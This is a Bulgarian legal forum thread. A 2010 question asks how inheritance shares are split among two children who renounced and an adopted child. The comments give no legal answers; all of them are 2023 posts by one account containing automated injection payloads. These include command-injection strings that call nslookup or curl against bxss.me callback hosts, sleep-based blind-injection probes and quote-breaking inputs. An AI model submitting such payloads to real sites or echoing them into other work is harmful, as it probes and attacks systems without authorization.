определяне на наследствен дял

03.06.2010г. 01:40:41
'А 'получава като наследство 10д-ка ниви, жени се за 'Б' през 1940г. и имат 2 деца('В' и' Г') в последствие 'А' осиновява 'Д'(пълно осиновяване) без 'Б' да я осиновява. през 1987г. 'А' почива и 'В' и 'Г' правят отказ от наследство от 'А'. през 1998 'Б' почива. какви са наследствените дялове съответно на 'В','Г' и 'Д'?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:23
&nslookup -q=cname hitavkvaelyqn852a2.bxss.me&'\"`0&nslookup -q=cname hitavkvaelyqn852a2.bxss.me&`'
lxbfYeaa
05.10.2023г. 07:23
&(nslookup -q=cname hitfnuvmolpmj53528.bxss.me||curl hitfnuvmolpmj53528.bxss.me)&'\"`0&(nslookup -q=cname hitfnuvmolpmj53528.bxss.me||curl hitfnuvmolpmj53528.bxss.me)&`'
lxbfYeaa
05.10.2023г. 07:23
|(nslookup -q=cname hitkrrisfzanu3ac8a.bxss.me||curl hitkrrisfzanu3ac8a.bxss.me)
lxbfYeaa
05.10.2023г. 07:23
`(nslookup -q=cname hitfywtpuexvbc8709.bxss.me||curl hitfywtpuexvbc8709.bxss.me)`
lxbfYeaa
05.10.2023г. 07:23
;(nslookup -q=cname hitqzszaerysi873bd.bxss.me||curl hitqzszaerysi873bd.bxss.me)|(nslookup -q=cname hitqzszaerysi873bd.bxss.me||curl hitqzszaerysi873bd.bxss.me)&(nslookup -q=cname hitqzszaerysi873bd.bxss.me||curl hitqzszaerysi873bd.bxss.me)
lxbfYeaa
05.10.2023г. 07:23
'"()
lxbfYeaa
05.10.2023г. 07:23
'&&sleep(27*1000)*yvakvq&&'
lxbfYeaa
05.10.2023г. 07:23
"&&sleep(27*1000)*jnxdsa&&"
lxbfYeaa
05.10.2023г. 07:23
'||sleep(27*1000)*vyefty||'
lxbfYeaa
05.10.2023г. 07:23
"||sleep(27*1000)*zihqvp||"

Коментар